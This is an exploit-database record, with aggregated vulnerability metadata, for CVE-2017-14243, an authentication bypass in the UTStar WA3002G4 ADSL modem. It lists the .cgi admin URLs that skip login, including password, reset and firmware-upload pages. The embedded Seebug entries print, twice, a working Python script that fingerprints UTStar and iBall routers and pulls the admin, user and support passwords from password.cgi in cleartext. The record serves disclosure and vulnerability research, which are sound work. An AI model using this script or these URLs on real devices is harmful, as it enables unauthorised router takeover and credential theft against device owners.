ID 1337DAY-ID-28571 Type zdt Reporter Gem George Modified 2017-09-18T00:00:00
Description
Exploit for hardware platform in category web applications
# Exploit Title: UTStar WA3002G4 ADSL Broadband Modem Authentication Bypass Vulnerability
# CVE: CVE-2017-14243
# Exploit Author: Gem George
# Author Contact: https://www.linkedin.com/in/gemgrge
# Vulnerable Product: UTStar WA3002G4 ADSL Broadband Modem
# Firmware version: WA3002G4-0021.01
# Vendor Homepage: http://www.utstar.com/
# Reference: https://www.techipick.com/iball-baton-adsl2-home-router-utstar-wa3002g4-adsl-broadband-modem-authentication-bypass
Vulnerability Details
======================
The CGI version of the admin page of UTStar modem does not authenticate the user and hence any protected page in the modem can be directly accessed by replacing page extension with cgi. This could also allow anyone to perform operations such as reset modem, change passwords, backup configuration without any authentication. The modem also disclose passwords of each users (Admin, Support and User) in plain text behind the page source.
How to reproduce
===================
Suppose 192.168.1.1 is the device IP and one of the admin protected page in the modem is http://192.168.1.1/abcd.html, then the page can be directly accessed as as http://192.168.1.1/abcd.cgi
Example URLs:
* http://192.168.1.1/info.cgi – Status and details
* http://192.168.1.1/upload.cgi – Firmware Upgrade
* http://192.168.1.1/backupsettings.cgi – perform backup settings to PC
* http://192.168.1.1/pppoe.cgi – PPPoE settings
* http://192.168.1.1/resetrouter.cgi – Router reset
* http://192.168.1.1/password.cgi – password settings
POC
=========
* https://www.youtube.com/watch?v=-wh1Y_jXMGk
# 0day.today [2018-02-20] #
{"sourceData": "# Exploit Title: UTStar WA3002G4 ADSL Broadband Modem Authentication Bypass Vulnerability\r\n# CVE: CVE-2017-14243\r\n# Exploit Author: Gem George\r\n# Author Contact: https://www.linkedin.com/in/gemgrge\r\n# Vulnerable Product: UTStar WA3002G4 ADSL Broadband Modem\r\n# Firmware version: WA3002G4-0021.01\r\n# Vendor Homepage: http://www.utstar.com/\r\n# Reference: https://www.techipick.com/iball-baton-adsl2-home-router-utstar-wa3002g4-adsl-broadband-modem-authentication-bypass\r\n \r\n \r\nVulnerability Details\r\n======================\r\nThe CGI version of the admin page of UTStar modem does not authenticate the user and hence any protected page in the modem can be directly accessed by replacing page extension with cgi. This could also allow anyone to perform operations such as reset modem, change passwords, backup configuration without any authentication. The modem also disclose passwords of each users (Admin, Support and User) in plain text behind the page source. \r\n \r\nHow to reproduce\r\n===================\r\nSuppose 192.168.1.1 is the device IP and one of the admin protected page in the modem is http://192.168.1.1/abcd.html, then the page can be directly accessed as as http://192.168.1.1/abcd.cgi\r\n \r\nExample URLs:\r\n* http://192.168.1.1/info.cgi \u2013 Status and details\r\n* http://192.168.1.1/upload.cgi \u2013 Firmware Upgrade\r\n* http://192.168.1.1/backupsettings.cgi \u2013 perform backup settings to PC\r\n* http://192.168.1.1/pppoe.cgi \u2013 PPPoE settings\r\n* http://192.168.1.1/resetrouter.cgi \u2013 Router reset\r\n* http://192.168.1.1/password.cgi \u2013 password settings\r\n \r\nPOC\r\n=========\r\n* https://www.youtube.com/watch?v=-wh1Y_jXMGk\n\n# 0day.today [2018-02-20] #", "description": "Exploit for hardware platform in category web applications", "sourceHref": "https://0day.today/exploit/28571", "reporter": "Gem George", "href": "https://0day.today/exploit/description/28571", "type": "zdt", "viewCount": 9, "references": [], "lastseen": "2018-02-20T05:30:35", "published": "2017-09-18T00:00:00", "cvelist": ["CVE-2017-14243"], "id": "1337DAY-ID-28571", "modified": "2017-09-18T00:00:00", "title": "UTStar WA3002G4 ADSL Broadband Modem - Authentication Bypass Vulnerability", "edition": 1, "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": 6.0, "vector": "NONE", "modified": "2018-02-20T05:30:35", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-14243"]}, {"type": "seebug", "idList": ["SSV:96645", "SSV:96644"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:67E5975DCB5A36F10F5E274794F5589B"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:144239"]}, {"type": "exploitdb", "idList": ["EDB-ID:42739"]}], "modified": "2018-02-20T05:30:35", "rev": 2}, "vulnersScore": 6.0}, "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T06:36:36", "description": "An authentication bypass vulnerability on UTStar WA3002G4 ADSL Broadband Modem WA3002G4-0021.01 devices allows attackers to directly access administrative settings and obtain cleartext credentials from HTML source, as demonstrated by info.cgi, upload.cgi, backupsettings.cgi, pppoe.cgi, resetrouter.cgi, and password.cgi.", "edition": 5, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-09-17T19:29:00", "title": "CVE-2017-14243", "type": "cve", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-14243"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:utstar:wa3002g4_firmware:wa3002g4-0021.01"], "id": "CVE-2017-14243", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-14243", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:utstar:wa3002g4_firmware:wa3002g4-0021.01:*:*:*:*:*:*:*"]}], "seebug": [{"lastseen": "2017-11-19T12:15:10", "description": "### Exploit Title: UTStar WA3002G4 ADSL Broadband Modem Authentication Bypass Vulnerability\r\n* CVE: CVE-2017-14243\r\n* Date: 15-09-2017\r\n* Exploit Author: Gem George\r\n* Author Contact: https://www.linkedin.com/in/gemgrge\r\n* Vulnerable Product: UTStar WA3002G4 ADSL Broadband Modem\r\n* Firmware version: WA3002G4-0021.01\r\n* Vendor Homepage: http://www.utstar.com/\r\n* Reference: https://www.techipick.com/iball-baton-adsl2-home-router-utstar-wa3002g4-adsl-broadband-modem-authentication-bypass\r\n \r\n \r\n### Vulnerability Details\r\nThe CGI version of the admin page of UTStar modem does not authenticate the user and hence any protected page in the modem can be directly accessed by replacing page extension with cgi. This could also allow anyone to perform operations such as reset modem, change passwords, backup configuration without any authentication. The modem also disclose passwords of each users (Admin, Support and User) in plain text behind the page source. \r\n \r\n### How to reproduce\r\n\r\nSuppose 192.168.1.1 is the device IP and one of the admin protected page in the modem is http://192.168.1.1/abcd.html, then the page can be directly accessed as as http://192.168.1.1/abcd.cgi\r\n \r\n### Example URLs:\r\n* http://192.168.1.1/info.cgi \u2013 Status and details\r\n* http://192.168.1.1/upload.cgi \u2013 Firmware Upgrade\r\n* http://192.168.1.1/backupsettings.cgi \u2013 perform backup settings to PC\r\n* http://192.168.1.1/pppoe.cgi \u2013 PPPoE settings\r\n* http://192.168.1.1/resetrouter.cgi \u2013 Router reset\r\n* http://192.168.1.1/password.cgi \u2013 password settings", "published": "2017-10-11T00:00:00", "type": "seebug", "title": "UTStar WA3002G4 ADSL Broadband Modem - Authentication Bypass(CVE-2017-14243)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-14243", "CVE-2017-14244", "CVE-2017-6558"], "modified": "2017-10-11T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96645", "id": "SSV:96645", "sourceData": "\n #/bin/python\r\n# -*- coding: utf-8 -*- \r\nimport sys\r\nimport os\r\nimport urllib2\r\nimport argparse\r\nimport re\r\nfrom termcolor import colored\r\n\r\ndef get_response(url):\r\n\tresponse = urllib2.urlopen(url)\r\n\treturn response.read()\r\n\r\ndef get_info(url):\r\n\tres = get_response(url + '/info.cgi')\r\n\tif \"iB-WRA150N\" in res: \t\r\n\t\tprint colored('[INF]','green'), 'Device identified: iBall 150M Wireless-N ADSL2+ Router (iB-WRA150N)'\r\n\t\tprint colored('[RES]', 'red'), 'Vulnerable to CVE-2017-6558'\r\n\t\tprint colored('[RES]', 'red'), 'Firmware Version: ' + find_between(res, '<td>', '</td>')\r\n\t\tget_cred(url)\r\n\telse:\r\n\t\tif \"ADSL2+\" in res:\t\t\r\n\t\t\tprint colored('[INF]','green'), 'Device identified: iBall ADSL2+ Home Router WRA150N'\r\n\t\t\tprint colored('[RES]','red'), 'Vulnerable to CVE-2017-14244'\r\n\t\t\tprint colored('[RES]','red'),'Firmware Version: FW' + find_between(res, 'FW', '</td>')\r\n\t\telse:\r\n\t\t\tif \"96338W\" in res:\t\r\n\t\t\t\tprint colored('[INF]','green'), 'Device identified: UTStar WA3002G4 ADSL Broadband Modem'\r\n\t\t\t\tprint colored('[RES]','red'), 'Vulnerable to CVE-2017-14243'\r\n\t\t\t\tget_cred(url)\r\n\t\t\telse:\r\n\t\t\t\tprint colored('[INF]','green'), 'Device not vulnerable to CVE-2017-6558, CVE-2017-14243 or CVE-2017-14244'\r\n\t\r\n\tprint colored('\\r\\nCompleted!\\r\\n','green'), \r\ndef get_cred(url):\r\n\tres = get_response(url + '/password.cgi')\r\n\tmatches = re.findall(\"(?<=\\s').*?(?=')\", res, re.DOTALL)\r\n\tprint '\\nUsernames\\tPasswords\\n', colored('---------\\t----------', 'green')\r\n\tprint 'admin\\t\\t' + matches[0] + '\\nuser\\t\\t' + matches[1] + '\\nsupport\\t\\t' + matches[2]\r\n\r\ndef find_between( s, first, last ):\r\n\ttry:\r\n\t\tstart = s.index( first ) + len( first )\r\n\t\tend = s.index( last, start )\r\n\t\treturn s[start:end]\r\n\texcept ValueError:\r\n \treturn \"\"\r\n\r\ndef display_info():\r\n\tprint colored('\\r\\n\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6','green')\r\n\tprint colored('\u00a6','green'), ' Check for CVE-2017-6558, CVE-2017-14243 & CVE-2017-14244\t', colored('\u00a6','green')\r\n\tprint colored('\u00a6','green'), '\t\t Created by: Gem George\t\t\t\t' , colored('\u00a6','green')\r\n\tprint colored('\u00a6','green'), '\t Website: https://www.techipick.com/ \t\t\t', colored('\u00a6','green')\r\n\tprint colored('\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6','green')\r\n\tprint \"\\r\\n\"\r\n\tprint colored('[SET]','blue'), 'Target URL: ', sys.argv[1]\r\n\r\ndef main():\r\n\tif len(sys.argv) != 2:\r\n\t\tprint 'Wrong argument count\\nEg: ' + os.path.basename(__file__) + ' http://192.168.1.1'\r\n\t\texit()\r\n\telse:\r\n\t\tdisplay_info()\t\t\r\n\t\turl = sys.argv[1].rstrip('/')\r\n\t\tget_info(url)\r\n \r\nif __name__ == \"__main__\":\r\n main()\n ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-96645"}, {"lastseen": "2017-11-19T12:15:10", "description": "### Exploit Title: iBall ADSL2+ Home Router Authentication Bypass Vulnerability\r\n* CVE: CVE-2017-14244\r\n* Date: 15-09-2017\r\n* Exploit Author: Gem George\r\n* Author Contact: https://www.linkedin.com/in/gemgrge\r\n* Vulnerable Product: iBall ADSL2+ Home Router WRA150N https://www.iball.co.in/Product/ADSL2--Home-Router/746\r\n* Firmware version: FW_iB-LR7011A_1.0.2\r\n* Vendor Homepage: https://www.iball.co.in\r\n* Reference: https://www.techipick.com/iball-baton-adsl2-home-router-utstar-wa3002g4-adsl-broadband-modem-authentication-bypass\r\n \r\n \r\n### Vulnerability Details\r\niBall ADSL2+ Home Router does not properly authenticate when pages are accessed through cgi version. This could potentially allow a remote attacker access sensitive information and perform actions such as reset router, downloading backup configuration, upload backup etc.\r\n \r\n### How to reproduce\r\nSuppose 192.168.1.1 is the router IP and one of the valid page in router is is http://192.168.1.1/abcd.html, then the page can be directly accessed as as http://192.168.1.1/abcd.cgi\r\n \r\n### Example URLs:\r\n* http://192.168.1.1/info.cgi \u2013 Status and details\r\n* http://192.168.1.1/upload.cgi \u2013 Firmware Upgrade\r\n* http://192.168.1.1/backupsettings.cgi \u2013 perform backup settings to PC\r\n* http://192.168.1.1/pppoe.cgi \u2013 PPPoE settings\r\n* http://192.168.1.1/resetrouter.cgi \u2013 Router reset\r\n* http://192.168.1.1/password.cgi \u2013 password settings", "published": "2017-10-11T00:00:00", "type": "seebug", "title": "iBall ADSL2+ Home Router Authentication Bypass Vulnerability(CVE-2017-14244)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-14243", "CVE-2017-14244", "CVE-2017-6558"], "modified": "2017-10-11T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96644", "id": "SSV:96644", "sourceData": "\n #/bin/python\r\n# -*- coding: utf-8 -*- \r\nimport sys\r\nimport os\r\nimport urllib2\r\nimport argparse\r\nimport re\r\nfrom termcolor import colored\r\n\r\ndef get_response(url):\r\n\tresponse = urllib2.urlopen(url)\r\n\treturn response.read()\r\n\r\ndef get_info(url):\r\n\tres = get_response(url + '/info.cgi')\r\n\tif \"iB-WRA150N\" in res: \t\r\n\t\tprint colored('[INF]','green'), 'Device identified: iBall 150M Wireless-N ADSL2+ Router (iB-WRA150N)'\r\n\t\tprint colored('[RES]', 'red'), 'Vulnerable to CVE-2017-6558'\r\n\t\tprint colored('[RES]', 'red'), 'Firmware Version: ' + find_between(res, '<td>', '</td>')\r\n\t\tget_cred(url)\r\n\telse:\r\n\t\tif \"ADSL2+\" in res:\t\t\r\n\t\t\tprint colored('[INF]','green'), 'Device identified: iBall ADSL2+ Home Router WRA150N'\r\n\t\t\tprint colored('[RES]','red'), 'Vulnerable to CVE-2017-14244'\r\n\t\t\tprint colored('[RES]','red'),'Firmware Version: FW' + find_between(res, 'FW', '</td>')\r\n\t\telse:\r\n\t\t\tif \"96338W\" in res:\t\r\n\t\t\t\tprint colored('[INF]','green'), 'Device identified: UTStar WA3002G4 ADSL Broadband Modem'\r\n\t\t\t\tprint colored('[RES]','red'), 'Vulnerable to CVE-2017-14243'\r\n\t\t\t\tget_cred(url)\r\n\t\t\telse:\r\n\t\t\t\tprint colored('[INF]','green'), 'Device not vulnerable to CVE-2017-6558, CVE-2017-14243 or CVE-2017-14244'\r\n\t\r\n\tprint colored('\\r\\nCompleted!\\r\\n','green'), \r\ndef get_cred(url):\r\n\tres = get_response(url + '/password.cgi')\r\n\tmatches = re.findall(\"(?<=\\s').*?(?=')\", res, re.DOTALL)\r\n\tprint '\\nUsernames\\tPasswords\\n', colored('---------\\t----------', 'green')\r\n\tprint 'admin\\t\\t' + matches[0] + '\\nuser\\t\\t' + matches[1] + '\\nsupport\\t\\t' + matches[2]\r\n\r\ndef find_between( s, first, last ):\r\n\ttry:\r\n\t\tstart = s.index( first ) + len( first )\r\n\t\tend = s.index( last, start )\r\n\t\treturn s[start:end]\r\n\texcept ValueError:\r\n \treturn \"\"\r\n\r\ndef display_info():\r\n\tprint colored('\\r\\n\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6','green')\r\n\tprint colored('\u00a6','green'), ' Check for CVE-2017-6558, CVE-2017-14243 & CVE-2017-14244\t', colored('\u00a6','green')\r\n\tprint colored('\u00a6','green'), '\t\t Created by: Gem George\t\t\t\t' , colored('\u00a6','green')\r\n\tprint colored('\u00a6','green'), '\t Website: https://www.techipick.com/ \t\t\t', colored('\u00a6','green')\r\n\tprint colored('\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6','green')\r\n\tprint \"\\r\\n\"\r\n\tprint colored('[SET]','blue'), 'Target URL: ', sys.argv[1]\r\n\r\ndef main():\r\n\tif len(sys.argv) != 2:\r\n\t\tprint 'Wrong argument count\\nEg: ' + os.path.basename(__file__) + ' http://192.168.1.1'\r\n\t\texit()\r\n\telse:\r\n\t\tdisplay_info()\t\t\r\n\t\turl = sys.argv[1].rstrip('/')\r\n\t\tget_info(url)\r\n \r\nif __name__ == \"__main__\":\r\n main()\n ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-96644"}], "exploitdb": [{"lastseen": "2017-09-18T19:02:28", "description": "UTStar WA3002G4 ADSL Broadband Modem - Authentication Bypass. CVE-2017-14243. Webapps exploit for Hardware platform", "published": "2017-09-15T00:00:00", "type": "exploitdb", "title": "UTStar WA3002G4 ADSL Broadband Modem - Authentication Bypass", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-14243"], "modified": "2017-09-15T00:00:00", "id": "EDB-ID:42739", "href": "https://www.exploit-db.com/exploits/42739/", "sourceData": "# Exploit Title: UTStar WA3002G4 ADSL Broadband Modem Authentication Bypass Vulnerability\r\n# CVE: CVE-2017-14243\r\n# Date: 15-09-2017\r\n# Exploit Author: Gem George\r\n# Author Contact: https://www.linkedin.com/in/gemgrge\r\n# Vulnerable Product: UTStar WA3002G4 ADSL Broadband Modem\r\n# Firmware version: WA3002G4-0021.01\r\n# Vendor Homepage: http://www.utstar.com/\r\n# Reference: https://www.techipick.com/iball-baton-adsl2-home-router-utstar-wa3002g4-adsl-broadband-modem-authentication-bypass\r\n\r\n\r\nVulnerability Details\r\n======================\r\nThe CGI version of the admin page of UTStar modem does not authenticate the user and hence any protected page in the modem can be directly accessed by replacing page extension with cgi. This could also allow anyone to perform operations such as reset modem, change passwords, backup configuration without any authentication. The modem also disclose passwords of each users (Admin, Support and User) in plain text behind the page source. \r\n\r\nHow to reproduce\r\n===================\r\nSuppose 192.168.1.1 is the device IP and one of the admin protected page in the modem is http://192.168.1.1/abcd.html, then the page can be directly accessed as as http://192.168.1.1/abcd.cgi\r\n\r\nExample URLs:\r\n* http://192.168.1.1/info.cgi \u2013 Status and details\r\n* http://192.168.1.1/upload.cgi \u2013 Firmware Upgrade\r\n* http://192.168.1.1/backupsettings.cgi \u2013 perform backup settings to PC\r\n* http://192.168.1.1/pppoe.cgi \u2013 PPPoE settings\r\n* http://192.168.1.1/resetrouter.cgi \u2013 Router reset\r\n* http://192.168.1.1/password.cgi \u2013 password settings\r\n\r\nPOC\r\n=========\r\n* https://www.youtube.com/watch?v=-wh1Y_jXMGk\r\n\r\n\r\n -----------------------Greetz----------------------\r\n++++++++++++++++++ www.0seccon.com ++++++++++++++++++\r\n Saran,Jithin,Dhani,Vignesh,Hemanth,Sudin,Vijith,Joel", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/42739/"}], "packetstorm": [{"lastseen": "2017-09-19T19:53:40", "description": "", "published": "2017-09-19T00:00:00", "type": "packetstorm", "title": "UTStar WA3002G4 ADSL Broadband Modem Authentication Bypass", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-14243"], "modified": "2017-09-19T00:00:00", "id": "PACKETSTORM:144239", "href": "https://packetstormsecurity.com/files/144239/UTStar-WA3002G4-ADSL-Broadband-Modem-Authentication-Bypass.html", "sourceData": "`# Exploit Title: UTStar WA3002G4 ADSL Broadband Modem Authentication Bypass Vulnerability \n# CVE: CVE-2017-14243 \n# Date: 15-09-2017 \n# Exploit Author: Gem George \n# Author Contact: https://www.linkedin.com/in/gemgrge \n# Vulnerable Product: UTStar WA3002G4 ADSL Broadband Modem \n# Firmware version: WA3002G4-0021.01 \n# Vendor Homepage: http://www.utstar.com/ \n# Reference: https://www.techipick.com/iball-baton-adsl2-home-router-utstar-wa3002g4-adsl-broadband-modem-authentication-bypass \n \n \nVulnerability Details \n====================== \nThe CGI version of the admin page of UTStar modem does not authenticate the user and hence any protected page in the modem can be directly accessed by replacing page extension with cgi. This could also allow anyone to perform operations such as reset modem, change passwords, backup configuration without any authentication. The modem also disclose passwords of each users (Admin, Support and User) in plain text behind the page source. \n \nHow to reproduce \n=================== \nSuppose 192.168.1.1 is the device IP and one of the admin protected page in the modem is http://192.168.1.1/abcd.html, then the page can be directly accessed as as http://192.168.1.1/abcd.cgi \n \nExample URLs: \n* http://192.168.1.1/info.cgi a Status and details \n* http://192.168.1.1/upload.cgi a Firmware Upgrade \n* http://192.168.1.1/backupsettings.cgi a perform backup settings to PC \n* http://192.168.1.1/pppoe.cgi a PPPoE settings \n* http://192.168.1.1/resetrouter.cgi a Router reset \n* http://192.168.1.1/password.cgi a password settings \n \nPOC \n========= \n* https://www.youtube.com/watch?v=-wh1Y_jXMGk \n \n \n-----------------------Greetz---------------------- \n++++++++++++++++++ www.0seccon.com ++++++++++++++++++ \nSaran,Jithin,Dhani,Vignesh,Hemanth,Sudin,Vijith,Joel \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/144239/utstar-bypass.txt"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:52", "description": "\nUTStar WA3002G4 ADSL Broadband Modem - Authentication Bypass", "edition": 1, "published": "2017-09-15T00:00:00", "title": "UTStar WA3002G4 ADSL Broadband Modem - Authentication Bypass", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-14243"], "modified": "2017-09-15T00:00:00", "id": "EXPLOITPACK:67E5975DCB5A36F10F5E274794F5589B", "href": "", "sourceData": "# Exploit Title: UTStar WA3002G4 ADSL Broadband Modem Authentication Bypass Vulnerability\n# CVE: CVE-2017-14243\n# Date: 15-09-2017\n# Exploit Author: Gem George\n# Author Contact: https://www.linkedin.com/in/gemgrge\n# Vulnerable Product: UTStar WA3002G4 ADSL Broadband Modem\n# Firmware version: WA3002G4-0021.01\n# Vendor Homepage: http://www.utstar.com/\n# Reference: https://www.techipick.com/iball-baton-adsl2-home-router-utstar-wa3002g4-adsl-broadband-modem-authentication-bypass\n\n\nVulnerability Details\n======================\nThe CGI version of the admin page of UTStar modem does not authenticate the user and hence any protected page in the modem can be directly accessed by replacing page extension with cgi. This could also allow anyone to perform operations such as reset modem, change passwords, backup configuration without any authentication. The modem also disclose passwords of each users (Admin, Support and User) in plain text behind the page source. \n\nHow to reproduce\n===================\nSuppose 192.168.1.1 is the device IP and one of the admin protected page in the modem is http://192.168.1.1/abcd.html, then the page can be directly accessed as as http://192.168.1.1/abcd.cgi\n\nExample URLs:\n* http://192.168.1.1/info.cgi \u2013 Status and details\n* http://192.168.1.1/upload.cgi \u2013 Firmware Upgrade\n* http://192.168.1.1/backupsettings.cgi \u2013 perform backup settings to PC\n* http://192.168.1.1/pppoe.cgi \u2013 PPPoE settings\n* http://192.168.1.1/resetrouter.cgi \u2013 Router reset\n* http://192.168.1.1/password.cgi \u2013 password settings\n\nPOC\n=========\n* https://www.youtube.com/watch?v=-wh1Y_jXMGk\n\n\n -----------------------Greetz----------------------\n++++++++++++++++++ www.0seccon.com ++++++++++++++++++\n Saran,Jithin,Dhani,Vignesh,Hemanth,Sudin,Vijith,Joel", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
